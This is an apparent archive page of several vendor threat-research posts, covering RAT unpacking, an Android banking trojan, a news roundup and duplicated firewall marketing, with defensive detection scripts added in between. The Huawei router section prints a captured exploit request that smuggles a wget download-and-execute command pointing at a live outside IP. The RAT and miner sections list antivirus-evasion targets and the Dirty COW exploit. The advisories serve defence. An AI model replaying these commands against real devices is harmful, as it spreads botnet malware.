Windows Malware Family FlawedAmmy Disassembled

Overview:

SonicWall Capture Labs Threat Research Team recently found a new sample and activity in July for the “FlawedAmmy” Windows RAT malware family. SonicWall has covered malicious MS-Office files used by phishing campaigns to distribute “FlawedAmmy” in the past. Phishing campaigns cover larger populations of victims and are usually sent to the masses, rather than the personalized spear-phishing campaigns sent to individuals. Today, we will cover the actual disassembly of the Windows “FlawedAmmy” RAT malware that runs after the VBA macro code is executed.

Remote Access Trojans (RATs), sometimes called creepware, can allow an attacker to gain complete control over the system. An attacker can do almost anything that someone physically sitting at the computer can do, including using any third-party device connected to the machine.

Stage 1 – Static Information:

Packer & Entropy Information:

Retrieving & Unpacking The Sample:

Unpacking the sample can be completed by setting a breakpoint on VirtualAlloc. VirtualAlloc is called multiple times, creating three buffers. The first buffer used holds hidden executable code, which can be seen here:

Translating this buffer into code will allow you to see the hidden code that is executed. Looking closer, the sample uses the imports VirtualAlloc, GetProcAddress, VirtualProtect, LoadLibraryA, VirtualFree, and VirtualQuery:

The second buffer holds an encrypted PE file. Here we can see half of it starting to be decrypted:

The third buffer will hold the decrypted PE file. Once we see this buffer decrypted we can dump the new PE file to disk. This will be Stage 2:
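As an added example (not code from the original write-up), the following Python script carves the decrypted PE out of a raw dump of that third buffer: it locates the MZ/PE headers and trims the dump to the file's real size using the section table. The sample PE and the surrounding dump bytes are constructed inline so it runs offline.

```python
"""Carve the decrypted PE out of a dumped VirtualAlloc buffer.

Added example, not code from the SonicWall write-up: once the third buffer
holds the decrypted PE, its bytes can be saved from the debugger and this
script finds the MZ/PE headers inside that dump and trims it to the file's
real size (the end of the last section's raw data). The sample PE and the
surrounding dump are constructed here so the script runs offline.
"""
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\x00\x00"
FILE_HEADER_SIZE = 20       # sizeof(IMAGE_FILE_HEADER)
SECTION_HEADER_SIZE = 40    # sizeof(IMAGE_SECTION_HEADER)


def find_pe_candidates(buf: bytes):
    """Yield offsets of each MZ header whose e_lfanew points at a PE signature."""
    pos = buf.find(IMAGE_DOS_SIGNATURE)
    while pos != -1:
        if pos + 0x40 <= len(buf):
            (e_lfanew,) = struct.unpack_from("<I", buf, pos + 0x3C)
            nt = pos + e_lfanew
            if buf[nt:nt + 4] == IMAGE_NT_SIGNATURE:
                yield pos
        pos = buf.find(IMAGE_DOS_SIGNATURE, pos + 1)


def pe_file_size(buf: bytes, base: int) -> int:
    """On-disk size of the PE at `base`, computed from its section table."""
    (e_lfanew,) = struct.unpack_from("<I", buf, base + 0x3C)
    file_header = base + e_lfanew + 4                      # after "PE\0\0"
    (num_sections,) = struct.unpack_from("<H", buf, file_header + 2)
    (opt_size,) = struct.unpack_from("<H", buf, file_header + 16)
    sections = file_header + FILE_HEADER_SIZE + opt_size
    end = sections + num_sections * SECTION_HEADER_SIZE   # headers at least
    for i in range(num_sections):
        hdr = sections + i * SECTION_HEADER_SIZE
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of the header
        raw_size, raw_ptr = struct.unpack_from("<II", buf, hdr + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def carve_pe(buf: bytes) -> bytes:
    """Return the first complete PE inside `buf`, or b'' if none is complete."""
    for base in find_pe_candidates(buf):
        size = pe_file_size(buf, base)
        if base + size <= len(buf):            # skip truncated dumps
            return buf[base:base + size]
    return b""


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 with one .text section (demo input only)."""
    e_lfanew, opt_size = 0x40, 0xE0
    sections = e_lfanew + 4 + FILE_HEADER_SIZE + opt_size
    raw_ptr, raw_size = 0x200, 0x200
    pe = bytearray(raw_ptr + raw_size)
    pe[0:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", pe, 0x3C, e_lfanew)
    pe[e_lfanew:e_lfanew + 4] = IMAGE_NT_SIGNATURE
    struct.pack_into("<HH", pe, e_lfanew + 4, 0x014C, 1)          # i386, 1 section
    struct.pack_into("<H", pe, e_lfanew + 4 + 16, opt_size)
    struct.pack_into("<H", pe, e_lfanew + 4 + FILE_HEADER_SIZE, 0x10B)  # PE32 magic
    pe[sections:sections + 8] = b".text\x00\x00\x00"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", pe, sections + 8, raw_size, 0x1000, raw_size, raw_ptr)
    pe[raw_ptr:raw_ptr + 4] = b"\xCC\xCC\xCC\xCC"
    return bytes(pe)


def sample_dump() -> bytes:
    """Constructed memory dump: slack, a decoy 'MZ', the PE, then trailing junk."""
    return b"\x00" * 0x100 + b"MZ" + b"\x00" * 0x50 + build_sample_pe() + b"\xFF" * 0x80


if __name__ == "__main__":
    carved = carve_pe(sample_dump())
    with open("stage2_dumped.bin", "wb") as fh:
        fh.write(carved)
    print(f"carved {len(carved):#x} bytes")
```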

Xor Encryption Used:

Routine One:

Routine Two:

Stage 2 – Static Information:

Packer & Entropy Information:

Static Network Indicators:

Anti-AntiVirus Techniques:

  • BullGuard.exe – AntiVirus
  • bdss.exe – BitDefender Core Component
  • bdagent.exe – BitDefender Total Security Component
  • V3Main.exe – AhnLab V3 Light
  • V3SP.exe – AhnLab V3 Light
  • PSUAMain.exe – Panda Internet Security

ProcMon Analysis:

During our testing, the sample actively loaded 88 modules (DLLs) while executing. The sample also opened 2,263 registry keys during operation and started two services called “AMMYY” and “Foundation”. The files are located at:

  • C:\ProgramData\AMMYY\wmihost.exe
  • C:\ProgramData\AMMYY\settings3.bin
  • C:\ProgramData\Foundation\wmites.exe
  • C:\ProgramData\Foundation\settings3.bin
  • C:\ProgramData\Foundation1\wmites.exe
  • C:\ProgramData\Foundation1\settings3.bin
  • C:\ProgramData\Microsoft\wsus.exe
  • C:\ProgramData\Microsoft\settings3.bin
  • C:\ProgramData\Microsoft Help\wsus.exe
  • C:\ProgramData\Microsoft Help\settings3.bin
  • C:\ProgramData\Microsoft Help\wsus_41b480.tmp

Loads one driver called winspool.drv.

If the sample detects that you are trying to debug the services and processes it has running, it will stop and delete them, as seen in the picture below:

Deletes original file using ShellExecute:
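The artifacts above translate directly into host detections. As an added example that is not part of the original analysis, this Python script scans a ProcMon CSV export for file operations on the listed drop paths and for registry writes under the service keys that services named AMMYY and Foundation would create; the CSV rows and the HKLM\SYSTEM\CurrentControlSet\Services key path are assumptions of the example, not captures from the page.

```python
"""Flag the FlawedAmmyy host artifacts listed above in a ProcMon CSV export.

Added example, not from the SonicWall write-up. It matches file operations on
the C:\\ProgramData drop paths and registry writes under the service keys that
the "AMMYY" and "Foundation" services would create. The CSV rows are
constructed to resemble a ProcMon export and are not real captures.
"""
import csv
import io
import re
from collections import Counter

# Drop locations and file names reported in the ProcMon analysis.
DROP_FILE_RE = re.compile(
    r"^C:\\ProgramData\\(AMMYY|Foundation1?|Microsoft|Microsoft Help)\\"
    r"(wmihost\.exe|wmites\.exe|wsus\.exe|settings3\.bin|wsus_[0-9a-f]+\.tmp)$",
    re.IGNORECASE,
)
# Windows keeps service definitions under this key; the names come from the write-up.
SERVICE_KEY_RE = re.compile(
    r"^HKLM\\SYSTEM\\CurrentControlSet\\Services\\(AMMYY|Foundation)(\\|$)",
    re.IGNORECASE,
)
FILE_OPS = {"CreateFile", "WriteFile", "SetRenameInformationFile"}
REG_OPS = {"RegCreateKey", "RegSetValue"}

# Constructed rows in ProcMon's CSV export layout (not a real capture).
SAMPLE_CSV = "\n".join([
    '"Time of Day","Process Name","PID","Operation","Path","Result"',
    r'"10:01:02.0001","msiexec.exe","1234","CreateFile","C:\ProgramData\Microsoft\wsus.exe","SUCCESS"',
    r'"10:01:02.0002","wsus.exe","2345","CreateFile","C:\ProgramData\AMMYY\wmihost.exe","SUCCESS"',
    r'"10:01:02.0003","wsus.exe","2345","RegSetValue","HKLM\SYSTEM\CurrentControlSet\Services\AMMYY\ImagePath","SUCCESS"',
    r'"10:01:02.0004","wmihost.exe","3456","CreateFile","C:\ProgramData\Foundation\settings3.bin","SUCCESS"',
    r'"10:01:02.0005","explorer.exe","4567","CreateFile","C:\Users\analyst\Desktop\notes.txt","SUCCESS"',
    r'"10:01:02.0006","wsus.exe","2345","CreateFile","C:\ProgramData\Microsoft Help\wsus.exe","NAME NOT FOUND"',
])


def classify(row):
    """Return a detection tag for one ProcMon row, or None if it is benign."""
    op, path = row["Operation"], row["Path"]
    if op in FILE_OPS and DROP_FILE_RE.match(path):
        return "flawedammyy_drop"
    if op in REG_OPS and SERVICE_KEY_RE.match(path):
        return "flawedammyy_service"
    return None


def scan(procmon_csv: str):
    """Return (tag, process, path) for every successful matching row."""
    hits = []
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        tag = classify(row)
        if tag and row["Result"] == "SUCCESS":   # ignore failed opens
            hits.append((tag, row["Process Name"], row["Path"]))
    return hits


def summarize(hits):
    """Count hits per tag and list the processes involved."""
    return {
        "counts": dict(Counter(tag for tag, _, _ in hits)),
        "processes": sorted({proc for _, proc, _ in hits}),
    }


if __name__ == "__main__":
    for hit in scan(SAMPLE_CSV):
        print(hit)
```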

Supported Systems:

  • 5.1 or 5.2 (Windows XP x86 & x64) & (Windows Server 2003 & R2)
  • 6.1 (Windows Server 2008 R2 & Windows 7)
  • 6.2 (Windows Server 2012 & Windows 8)
  • 6.3 (Windows Server 2012 R2 & Windows 8.1)

No support for minor version 6.4 or Windows 10.
Microsoft never shipped a minor version 6.4, so a return value of “9” is an error.

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: FlawedAmmyy.RAT (Trojan)

Cyber Security News & Trends – 07-05-19

This week, SonicWall data continues to drive innovation in the cybersecurity space, the biggest cybersecurity crises of 2019 so far, and FireEye reconsiders its choice of keynote speaker for this year’s Cyber Defense Summit following online backlash.


SonicWall Spotlight

Three-Tiered Security for the Internet of Things – Engineering.com

  • Galvanized by data from the 2019 annual SonicWall Cyber Threat Report, which shows a rapid increase in Internet of Things (IoT) attacks, cybersecurity researchers are doubling down on efforts to improve security in IoT by tackling vulnerabilities in microcontroller units (MCUs). Avnet and Microsoft have partnered in one such effort, designing the infrastructure of hardware along with its software and cloud-ecosystem to deliver Azure Sphere.

SonicWall TZ300P Review: A Multi-Site Marvel – IT Pro

  • IT Pro reviews the SonicWall TZ300P, a versatile and affordable firewall, built with SMBs and remote offices in mind. The commendatory review concludes that the TZ300P delivers a “wealth of security measures at a great price.”

Cybersecurity News

The Biggest Cybersecurity Crises of 2019 So Far – Wired

  • From the Perceptics breach to LockerGoga to supply chain attacks on Microsoft and Asus, Wired provides an overview of the biggest cyberattacks reported in the first half of the year.

Hillary Clinton Withdraws From Cybersecurity Conference Speaking Gig, Citing ‘Unforeseen Circumstance’ – The Epoch Times

  • Following online backlash to a controversial keynote speaker announcement for this year’s FireEye Cyber Defense Summit, FireEye has announced in an email this week that Hillary Clinton will no longer be participating in this year’s conference as the keynote speaker citing “unforeseen circumstance.”

Hackers in Md. Breach Accessed Names, Social Security Numbers of up to 78,000 People – The Washington Post

  • A labor department breach in Maryland has resulted in the exposure of names and Social Security numbers belonging to as many as 78,000 people who received unemployment in 2012 or who sought a general equivalency diploma in recent years.

Confirmed: 2 Billion Records Exposed In Massive Smart Home Device Breach – Forbes

  • Researchers from vpnMentor have uncovered a database housing more than 2 billion logs containing everything from user passwords to account reset codes and even a “smart” camera recorded conversation. The database, belonging to Chinese company Orvibo, was not password protected.

US Border Agency Cuts Ties with Breached Surveillance Contractor – The Verge

  • US Customs and Border Protection has suspended all federal contracts with Perceptics, a surveillance contractor suspected of suffering a data breach first reported in May.

And finally:

WannaLocker Ransomware Found Combined with RAT and Banking Trojan – SC Magazine

  • Researchers are warning that a new version of WannaLocker – essentially a mobile derivative of WannaCry ransomware – has been enhanced with spyware, remote access trojan and banking trojan capabilities.


Android Brazilian banker with Spyware, Phishing and Ransomware components

SonicWall Capture Labs Threats Research team observed an Android banking malware that has additional components: spyware, ransomware and a RAT (Remote Access Trojan). Even though this malware appears to be a work in progress, it is still potent enough to cause devastating effects if it infects the right individuals. Currently this malware targets Brazilian banks, and one of its functions centers on stealing its victims’ credit card details.

Infection Cycle

Upon installation it uses the icon and application name of Google Protect; based on this, there is a possibility that this malicious application spreads under the guise of Google Play Protect:

Once executed it displays a screen which states “Activate Protection”. Upon clicking the button, the malware takes us to the home screen and its icon vanishes from the app drawer, but the malware continues to execute in the background as shown below. This is typical behavior exhibited by a number of malicious samples:

Initial Network Communication

The malware communicates with the server starting by registering itself once it infects the device:

Sensitive information shared by the malware with the server includes:

  • Phone number
  • Gmail account email
  • Device manufacturer
  • Device model

The malware then upgrades the protocol from HTTP to WebSocket, thereby using WebSockets as the medium for further communication:

Soon we started observing commands being sent by the server and the malware’s responses to these commands; both were carried out via WebSockets.

Command Structure

The WebSocket direction “incoming” refers to the commands sent by the server in the variable extra, and the direction “outgoing” refers to the malware’s response to those commands. We have highlighted a few interesting ones that we observed during our analysis:

Incoming command – info_list – sends information about the device:

Incoming command – callLog – sends the call log from the infected device:

Incoming command – contacts – sends contacts stored on the infected device:

Incoming command – ls followed by the path of a directory – sends the contents of the directory:

Incoming command – dl followed by the path to a file – sends that file to the attacker’s server. In the example below an image file was exfiltrated from our infected device:

The following image shows a glimpse of hard-coded commands present in the code:

Below is a complete list of commands supported by this malware:

Apart from the commands above there are traces in the code that indicate this malware is capable of the following:

  • Extract GPS related data from the device
  • Record audio from the microphone and save the recordings locally (which can later be exfiltrated)

Considering that this malware can receive and execute commands, and that one of the commands is to DDoS a target, it is possible that this malware is operated as a botnet. Additionally, based on the commands above, this malware can act as a Remote Access Trojan (RAT), perform phishing and extract sensitive information like spyware.
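As an added example, not part of the original analysis, the script below triages a captured WebSocket exchange for the command set described above. It assumes each message was logged as one JSON line with a direction field and the extra field named above; the JSON framing, the selfdestruct command and the sample messages are constructed assumptions, not captures from the page.

```python
"""Triage captured WebSocket traffic for the banker's C2 commands.

Added example, not from the SonicWall write-up. It assumes each captured
WebSocket message was logged as one JSON line with a "direction" field
("incoming" = from the server) and the "extra" field that carries the command
(the field name is from the write-up; the JSON framing is an assumption).
The messages below are constructed, not a real capture.
"""
import json
import posixpath

# Commands documented above, with what they expose and how badly.
COMMANDS = {
    "info_list": ("device information", "medium"),
    "callLog":   ("call log exfiltration", "high"),
    "contacts":  ("contact list exfiltration", "high"),
    "ls":        ("directory listing", "medium"),
    "dl":        ("file exfiltration", "critical"),
}

# Constructed log: one JSON object per WebSocket message.
SAMPLE_LOG = "\n".join([
    '{"direction": "incoming", "extra": "info_list"}',
    '{"direction": "outgoing", "extra": "model=Pixel"}',
    '{"direction": "incoming", "extra": "contacts"}',
    '{"direction": "incoming", "extra": "ls /sdcard/DCIM/Camera"}',
    '{"direction": "incoming", "extra": "dl /sdcard/DCIM/Camera/IMG_0001.jpg"}',
    '{"direction": "incoming", "extra": "dl /sdcard/Download/statement.pdf"}',
    '{"direction": "incoming", "extra": "selfdestruct"}',   # made-up, unknown command
])


def parse_command(extra: str):
    """Split 'dl /path/file' into ('dl', '/path/file'); bare commands get ''."""
    parts = extra.strip().split(maxsplit=1)
    if not parts:
        return "", ""
    return parts[0], (parts[1] if len(parts) > 1 else "")


def triage(ws_log: str):
    """Return one alert per server command; dl alerts note a preceding ls."""
    alerts, listed_dirs = [], []
    for line in ws_log.splitlines():
        if not line.strip():
            continue
        msg = json.loads(line)
        if msg.get("direction") != "incoming":
            continue                      # responses are not commands
        cmd, arg = parse_command(msg.get("extra", ""))
        desc, severity = COMMANDS.get(cmd, ("unrecognized command", "low"))
        alert = {"cmd": cmd, "arg": arg, "desc": desc, "severity": severity}
        if cmd == "ls":
            listed_dirs.append(posixpath.normpath(arg))
        if cmd == "dl":
            # operator browsed the directory first, then pulled a file from it
            parent = posixpath.dirname(posixpath.normpath(arg))
            alert["after_listing"] = parent in listed_dirs
        alerts.append(alert)
    return alerts


def exfiltrated_files(alerts):
    """Paths the operator pulled with dl, for victim notification."""
    return [a["arg"] for a in alerts if a["cmd"] == "dl"]


def highest_severity(alerts):
    order = ["low", "medium", "high", "critical"]
    return max((a["severity"] for a in alerts), key=order.index, default="none")


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for a in found:
        print(a)
    print("exfiltrated:", exfiltrated_files(found), "worst:", highest_severity(found))
```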

Banking Targets

This malware contains a list of hard-coded Brazilian banking app names. Additionally there are a number of strings in Portuguese making it apparent that this malware is targeted towards Brazilian users:

If an app from this list is opened, for instance com.santander.app, the malware shows a notification stating – “For your security, we ask that you validate your in-app access data from the Santander Bank”:

Following this it asks the victim for their Credit Card details:

We suspect this information to be saved on h[xx]ps://androidrat-f5006.firebaseio.com/kl_android/infosanta

Ransomware Component

The malware also contains a ransomware component, but it did not work for us during our analysis of this threat. There is a class named RansoActivity, and within this class is a typical ransomware message which translates to:

  • All your files have been encrypted and if payment is not made in BTC within the stipulated period all your files will be deleted permanently.


Additional Notes

  • VirusTotal Relations can be used to understand whether a malware sample belongs to a larger campaign. We tried to find possible connections for a few hard-coded URLs present in this malware, but it did not give us further leads:

  • The developer name for this app is Ervadark Socity, we could not find anything else related to this developer
  • The malware gets updated by downloading an update and storing it in the /Download/ folder as update.apk

Closing Thoughts

Overall it is difficult to categorize this malware considering its list of different functionalities. It can target users of Brazilian banks and attempt to steal their credit card details by showing them phishing pages. Additionally, it can execute commands sent by an attacker and spy on its victims, and finally it also has ransomware (which did not work for us) and DDoS components.

Giving a specific category to this malware is a tough ask!


SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AndroidOS.PhishRansom.LK (Trojan)
  • GAV: AndroidOS.PhishRansom.BK (Trojan)

Details of the sample analyzed:

  • MD5: 78c9bfea25843a0274c38086f50e8b1c
  • Package name: com.google.protect
  • Application name: Google Protect
  • Developer name: Ervadark Socity

Banking targets of this application:

  • br.com.bb.android
  • com.bradesco
  • com.itau
  • com.itau.empresas
  • com.santander.app
  • com.santandermovelempresarial.app
  • br.com.bradesco.next
  • br.com.original.bank
  • br.com.intermedium


Switch to SonicWall: 8 Reasons to Trade In Your Old Firewall

Choosing a cybersecurity provider you trust is no easy task. So many factors need to be considered, prioritized and balanced.

  • You need to stop cyberattacks, but want to ensure you’re with the right company.
  • You need a firewall, but want more than a hardware vendor.
  • You need a sandbox, but want to know it works without affecting performance or business operations.
  • You need to manage your ecosystem, but want to do it from a single view that’s accessible anywhere.
  • You need an end-to-end platform, but want to know it’s more than marketing buzz.
  • You need an enterprise-grade solution, but you want something that’s affordable with today’s tight budgets.

If you’re ready for a change, I ask that you consider SonicWall, a cybersecurity veteran with nearly three decades of experience stopping cyberattacks and defending organizations in the cyber arms race.

Explore the many real-world reasons customers of Cisco, Juniper, Sophos, and WatchGuard are switching to SonicWall for good. And not looking back.

SonicWall helps protect you everywhere. Automatically.

Cybersecurity layered across your organization.

SonicWall protects you from the perimeter to the endpoint. Our integrated Capture Cloud Platform scales automated real-time breach detection and prevention across email, wireless, wired, cloud and mobile networks.

Top-ranked firewalls with budget-saving TCO.

NSS Labs gave SonicWall a ‘Recommended’ rating and placement in the upper-right quadrant of the 2018 Security Value Map™ for next-generation firewalls. Security effectiveness and overall value helped SonicWall achieve the rating for the fifth time.

Multi-engine malware mitigation.

Through anti-evasion and ‘block until verdict’ capabilities, the multi-engine Capture Advanced Threat Protection (ATP) cloud sandbox ensures even the most advanced malware and cyberattacks are mitigated. Limited, single-engine approaches don’t deliver the same efficacy and scale of attack prevention.

Security against ‘never-before-seen’ attacks and processor threats.

Included in the Capture ATP sandbox service, SonicWall Real-Time Deep Memory Inspection (RTDMI™) identifies and mitigates memory-based attacks, including Meltdown, Spectre, Foreshadow, PortSmash and Spoiler exploits, malicious PDFs and Microsoft Office files.

Management and analytics via a ‘single pane of glass.’

SonicWall Capture Security Center offers the ultimate in visibility, agility and capacity to centrally govern the entire SonicWall security ecosystem with greater clarity, precision and speed — all from a single console.

Deep SSL and TLS inspection.

SonicWall DPI-SSL scans SSL/TLS traffic to properly decrypt, inspect, detect and mitigate hidden cyberattacks. Many vendors either can’t inspect encrypted traffic or force you to block all traffic to prevent attacks over HTTPS.

True ransomware protection.

SonicWall detects and prevents ransomware attacks — like Cerber, BadRabbit, Nemucod, WannaCry, Petya and NotPetya — before they can breach your network and encrypt your data.

Endpoint protection with automated rollback.

SonicWall Capture Client, powered by SentinelOne, is modern, next-generation endpoint protection for today’s hybrid environments. SentinelOne is the top-ranked endpoint protection technology in the NSS Labs Advanced Endpoint Protection (AEP) Security Value Map and received the coveted ‘Recommended’ rating.

Switch to SonicWall: 8 reasons to trade in your old firewalls

Choosing a cybersecurity provider you can trust is not easy. There are many factors to consider, prioritize and weigh.

  • You need to stop cyberattacks, but you need the right partner.
  • You need a firewall, but you need something more than a mere hardware vendor.
  • You need a sandbox, but you need to be sure it works without affecting performance or business operations.
  • You need to manage your ecosystem, but you need to do it from a single vantage point accessible from anywhere.
  • You need an end-to-end platform, but you need to know it is more than an unconventional marketing operation.
  • You need an enterprise-grade solution, but you need to find something that is feasible given today’s budget constraints.

If you are ready for a change, I ask you to consider SonicWall, a cybersecurity veteran with around thirty years of experience in stopping cyberattacks and defending organizations in the cyber arms race.

Discover the many real reasons why customers of Cisco, Juniper, Sophos and WatchGuard are switching to SonicWall for good. With no second thoughts.

SonicWall helps protect you everywhere, automatically.

Multi-layered cybersecurity for the entire organization.

SonicWall offers complete protection, from the perimeter to the endpoint. Our integrated Capture Cloud Platform automatically enables real-time breach detection and prevention for email, wireless networks, wired networks, the cloud and mobile networks.

High-end firewalls with a total cost of ownership that saves on budget.

NSS Labs gave SonicWall the “Recommended” rating, placing it in the upper-right quadrant of the 2018 Security Value Map™ for next-generation firewalls. Security effectiveness and overall value enabled SonicWall to earn the rating for the fifth time.

Multi-engine malware mitigation.

Thanks to anti-evasion and “block until verdict” capabilities, the multi-engine Capture Advanced Threat Protection (ATP) cloud sandbox ensures the mitigation of even the most sophisticated malware and cyberattacks. Isolated single-engine solutions do not guarantee the same effectiveness and the same scale of attack prevention.

Security against “never-before-seen” attacks and processor threats.

Part of the Capture ATP sandbox service, SonicWall Real-Time Deep Memory Inspection (RTDMI™) identifies and mitigates memory-based attacks, including the Meltdown, Spectre, Foreshadow, PortSmash and Spoiler exploits, malicious PDF files and Microsoft Office files.

Management and analytics in SPOG mode (“from a single pane of glass”)

SonicWall Capture Security Center offers the best in visibility, agility and capacity to centrally manage the entire SonicWall security ecosystem with greater clarity, precision and speed, all from a single console.

Deep SSL and TLS inspection.

SonicWall DPI-SSL scans SSL/TLS traffic to properly decrypt, inspect, detect and mitigate hidden cyberattacks. Many competing products either cannot inspect encrypted traffic or force you to block all traffic to prevent attacks over HTTP.

True ransomware protection.

SonicWall detects and prevents ransomware attacks, such as Cerber, BadRabbit, Nemucod, WannaCry, Petya and NotPetya, before they breach the network and encrypt data.

Endpoint protection with automatic rollback.

SonicWall Capture Client, which uses SentinelOne technology, is modern, next-generation endpoint protection for today’s hybrid environments. SentinelOne is considered the top endpoint protection technology in the NSS Labs Advanced Endpoint Protection (AEP) Security Value Map and received the coveted “Recommended” rating.

New wave of attacks attempting to exploit Huawei home routers

SonicWall has observed a new wave of attacks targeting Huawei home routers in an attempt to exploit the vulnerability CVE-2017-17215.

The attack starts by scanning internet-facing IPs on port 37215 and then attempting to POST the command below:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"

<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.83.157.41 -l /tmp/binary -r /bins/mips
/bin/busybox chmod 777 * /tmp/binary
/tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Once the vulnerability is exploited successfully on the target router, the following shell commands will be executed on it:

/bin/busybox wget -g 103.83.157.41 -l /tmp/binary -r /bins/mips // Download and save file
/tmp/binary huawei // Execute file

At the time of writing this article, the malware download site is still active and delivering payloads to the exploited routers. It provides binaries for a wide range of target architectures, including mips, arm, x86, mpsl, ppc, sh4, m68k and others.

When executed, these binaries connect to their C&C and can receive commands to conduct various types of DoS attacks, such as UDP DoS and TCP DoS, against a given target.
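An added example, not SonicWall's signature: a Python inspector that classifies HTTP requests seen on port 37215 for the pattern above, a POST to /ctrlt/DeviceUpgrade_1 whose NewStatusURL or NewDownloadURL elements contain shell command substitution. The sample requests are constructed, with a harmless echo in place of the real download command.

```python
"""Detect CVE-2017-17215 exploit attempts in HTTP requests to port 37215.

Added example, not from the SonicWall write-up. A legitimate DeviceUpgrade
request carries plain URLs in NewStatusURL/NewDownloadURL; the attack seen
above stuffs shell command substitution into them. The requests below are
constructed (the injected command is a harmless echo), not the captured attack.
"""
import re

VULN_PATH = "/ctrlt/DeviceUpgrade_1"
URL_TAGS = ("NewStatusURL", "NewDownloadURL")
# Shell syntax that has no business inside a firmware download URL.
INJECTION_RE = re.compile(r"\$\(|`|;|\|\||&&|\n")

# Constructed requests; only the structure mirrors the captured attack.
ATTACK_REQUEST = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Content-Length: 200\r\n"
    'Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway"\r\n'
    "\r\n"
    '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    "<NewStatusURL>$(echo constructed-sample\necho second-line)</NewStatusURL>"
    "<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>"
)
BENIGN_UPGRADE = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
    "Content-Length: 120\r\n"
    "\r\n"
    "<s:Envelope><s:Body><u:Upgrade>"
    "<NewStatusURL>http://192.0.2.10/status</NewStatusURL>"
    "<NewDownloadURL>http://192.0.2.10/fw.bin</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>"
)


def parse_request(raw: str):
    """Split raw HTTP text into (method, path, headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    parts = lines[0].split()
    method, path = (parts[0], parts[1]) if len(parts) >= 2 else ("", "")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path.split("?", 1)[0], headers, body


def inspect_request(raw: str) -> dict:
    """Return a verdict ('allow', 'watch', 'block') and the reasons for it."""
    method, path, headers, body = parse_request(raw)
    findings = []
    if method == "POST" and path.lower() == VULN_PATH.lower():
        findings.append("POST to the DeviceUpgrade_1 UPnP endpoint")
        auth = headers.get("authorization", "").lower()
        if 'digest username="dslf-config"' in auth:
            findings.append("dslf-config username seen in the attack's Authorization header")
        for tag in URL_TAGS:
            # the body is often not well-formed XML, so search rather than parse it
            m = re.search(rf"<{tag}>(.*?)</{tag}>", body, re.S | re.I)
            if m and INJECTION_RE.search(m.group(1)):
                findings.append(f"shell metacharacters inside <{tag}>")
    injected = any("metacharacters" in f for f in findings)
    verdict = "block" if injected else ("watch" if findings else "allow")
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    print(inspect_request(ATTACK_REQUEST))
    print(inspect_request(BENIGN_UPGRADE))
```

A plain POST to the upgrade endpoint is only "watch" because a real management client may use it; the verdict turns to "block" only when a URL element carries shell syntax.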

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13151 Huawei HG532 Remote Command Execution
GAV: (Cloud Id: 71637770) Mirai.O (Trojan)
GAV: (Cloud Id: 71634637) Mirai.O (Trojan)
GAV: (Cloud Id: 71637780) AELtrojan (Trojan)
GAV: (Cloud Id: 71636342) SMMR1 (Trojan)
GAV: (Cloud Id: 71637710) SMMR1 (Trojan)
GAV: (Cloud Id: 71638263) AELtrojan (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)
GAV: (Cloud Id: 71637583) Mirai.O (Trojan)
GAV: (Cloud Id: 71635399) Mirai.O (Trojan)

Cryptomining trojan targeting Linux platforms seen in the wild

This week, the SonicWall Capture Labs team came across another cryptominer that targets the Linux platform. This Trojan arrives armed with functionality to ensure successful infection, including the use of a rootkit and known Linux exploits.

Infection Cycle

This Trojan comes as a bash file with over 800 lines of code. Its main function is to mine cryptocurrency using the Stratum mining protocol and the CryptoNight algorithm on pools such as supportxmr.com, minexmr.com, poolin.com, dwarfpool.com, nanopool.com and f2pool.com. To gain root access, and essentially full control of the victim machine, it uses BRootkit, leverages the vulnerability CVE-2016-5195 and uses the BillGates Linux malware.

The script consists of the following sub functions:

  • BasicInit – checks connectivity, pings the remote host (auth.to0ls.com or 90.140.35) and checks the platform type by reading the “issue” file (/etc/issue) to identify whether it is CentOS, Ubuntu or Debian.
  • RunInBack – to get root access it downloads another component that uses a known exploit called Dirty COW (CVE-2016-5195), a privilege escalation vulnerability in the Linux kernel.
  • WorkProc – the main mining function.
  • Dandelion – it tries to infect other systems by looking at
  • Scavenger – kills services and uninstalls the following: safedog, aegis, yunsuo, clamd, Avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.
